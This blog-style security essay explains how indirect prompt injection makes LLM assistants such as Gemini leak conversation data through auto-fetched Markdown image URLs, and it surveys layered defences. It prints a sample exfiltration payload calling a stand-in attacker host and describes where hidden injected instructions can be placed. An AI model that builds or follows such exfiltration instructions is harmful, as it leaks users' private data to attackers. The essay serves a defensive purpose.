The Rendering Channel Problem: How URL Injection Turns LLMs Into Data Pipes

Google’s BugHunters blog post on mitigating URL-based exfiltration in Gemini is worth reading carefully, not because the attack is new, but because of what it reveals about the structural problem sitting at the intersection of LLM capabilities and rich output rendering. This class of vulnerability has been documented across multiple AI assistants over the past few years, and the fact that Google is writing publicly about their mitigations signals that the problem is both real and genuinely tricky to solve.

The Mechanics of the Attack

The core of URL-based exfiltration in LLMs is a three-step chain. First, an attacker plants malicious instructions somewhere in content the model will process: a document, an email, a web page, a calendar event. Second, those instructions direct the model to construct a URL that encodes sensitive information from the conversation context, typically in query parameters. Third, if the client renders Markdown and auto-fetches resources like images, that URL gets requested and the data lands on the attacker’s server.

The Markdown vector looks like this:

![image](https://attacker.example.com/collect?data=CONVERSATION_CONTENT_HERE)

When a Markdown renderer processes this as an image tag, the HTTP client automatically issues a GET request for the URL. No user interaction required. The data is already in flight before anyone notices anything unusual, and from the user’s perspective they just see a broken image or nothing at all.

What makes this particularly potent is that the injected instruction doesn’t need to be visible to the user. It can be hidden in white text on a white background in a document, buried in HTML comments in a webpage, or tucked into metadata fields the LLM processes but the user never reads. This is the indirect prompt injection model described in Kai Greshake et al.’s 2023 paper “Not What You’ve Signed Up For: Compromising Real-World LLM-Integrated Applications”, which remains the foundational treatment of this attack class.

A Brief History of LLMs Getting Exfiltrated

Prompt injection as a concept predates most current AI assistants. Riley Goodside demonstrated in 2022 that you could override GPT-3’s behavior by embedding adversarial instructions in user-controlled input. The technique was largely theoretical for a while: models without tool access or rendering capabilities didn’t have useful exfiltration channels.

That changed when AI assistants gained browsing capabilities and started rendering Markdown in their responses. In 2023, security researcher Johann Rehberger demonstrated the attack against Bing Chat, showing that a malicious webpage could inject instructions that Bing would follow while summarizing content, including constructing exfiltration URLs. Similar demonstrations followed for ChatGPT with the Browsing and Plugins features enabled. Rehberger’s Embrace The Red blog catalogued a substantial number of these attacks across different AI systems and is worth reading if you want to see the full variety of exploitation techniques.

Gemini, with its deep integration into Google Workspace and its ability to process emails, documents, and calendar items, presents a particularly rich target. The amount of sensitive context potentially available to the model in a Workspace session is substantial, which raises the stakes for any exfiltration primitive.

Why This Is Harder to Fix Than It Looks

The naive fix is obvious: don’t render Markdown images in AI responses, or at least don’t auto-fetch them. But the problem has three distinct layers, and patching one doesn’t eliminate the others.

The model layer is where the injected instruction gets followed in the first place. You can train or fine-tune the model to refuse instructions that ask it to construct URLs containing conversation data. This is imperfect because adversarial instructions can be obfuscated, split across multiple turns, or framed in ways the model doesn’t recognize as exfiltration attempts. Jailbreak research has demonstrated repeatedly that model-level refusals are bypassable with sufficient creativity.

The rendering layer is where Markdown gets converted to HTML and image URLs get fetched. Stripping or sandboxing image tags in model output removes the auto-fetch side effect. But LLMs are used across many surfaces, some of which are third-party clients that Google doesn’t control. A Gemini API consumer building their own interface might render model output directly, reintroducing the vulnerability even if the hosted Gemini UI is safe.

The network layer is where outbound requests to external URLs could be blocked or filtered. A strict Content Security Policy on the rendering client, or a proxy that validates outbound image requests against an allowlist, can prevent the data from actually leaving. But this requires control over every client that renders model output.

Google’s approach in Gemini, based on what they’ve published, combines mitigations at multiple layers: model-level training to refuse exfiltration instructions, restrictions on URL rendering in responses, and client-side controls on auto-fetching. Defense in depth is the right call here because no single layer is reliable on its own.

The Deeper Structural Problem

What the URL exfiltration attack actually exposes is a fundamental tension in how LLM assistants are built. The capabilities that make them useful, processing rich external content, accessing user data in context, generating formatted output with embedded references, are the same capabilities that create the attack surface.

An LLM that can only answer questions about its training data and returns plain text has no exfiltration channel. The moment you add “process this document I uploaded” plus “render your response as Markdown,” you’ve connected an untrusted input channel to an output channel with network side effects, with the model’s entire context sitting in between. That’s an interesting data flow from a security standpoint.

This is structurally similar to problems that have appeared in other contexts. Server-Side Request Forgery attacks abuse the server as a proxy to reach internal resources. Cross-site scripting abuses the browser’s script execution as a channel between attacker-controlled content and user context. URL exfiltration in LLMs abuses the model and its rendering environment as a channel between attacker-controlled content and user data. The pattern is familiar even if the specific mechanism is new.

What This Means if You’re Building on LLM APIs

If you’re building applications on top of Gemini, GPT-4, or any other LLM that processes external content, this attack class is relevant to your threat model. A few concrete considerations:

First, if your application renders model output in a browser context, treat that output as untrusted HTML. Don’t pass raw model responses directly into innerHTML. Use a Markdown renderer that sanitizes output, strips image tags, or at minimum applies a CSP that blocks cross-origin image requests.

Second, if your application uses an LLM to process user-supplied documents or URLs, the content in those documents can contain adversarial instructions. The model may follow them. Prompt injection is not a solved problem at the model level, and you can’t assume current models will reliably refuse all malicious instructions embedded in processed content.

Third, be conservative about what context you include in the model’s prompt. Data that isn’t in the context can’t be exfiltrated. If your application has access to sensitive user data, think carefully about whether the model actually needs all of it for the task at hand, or whether you’re including it out of convenience.

Fourth, for agentic applications where the model can make network requests directly, not just influence rendering, the stakes are higher. An agent with HTTP tool access that follows an injected exfiltration instruction doesn’t need the rendering layer at all. The URL gets fetched directly. This is a natural extension of the same attack class and one that becomes more relevant as LLMs are given more tool access.

The OWASP LLM Top 10 lists prompt injection as LLM01, the top vulnerability class, for exactly these reasons. It’s not that individual attacks are catastrophically sophisticated. It’s that the attack surface is broad, the defenses are imperfect, and the consequences of a successful exfiltration in a model with access to email, documents, and calendar data can be significant.

Google publishing their mitigations openly is useful for the ecosystem. The more detail that’s available about what works and what doesn’t at each layer, the better position every builder is in when thinking through defenses for their own LLM-integrated applications.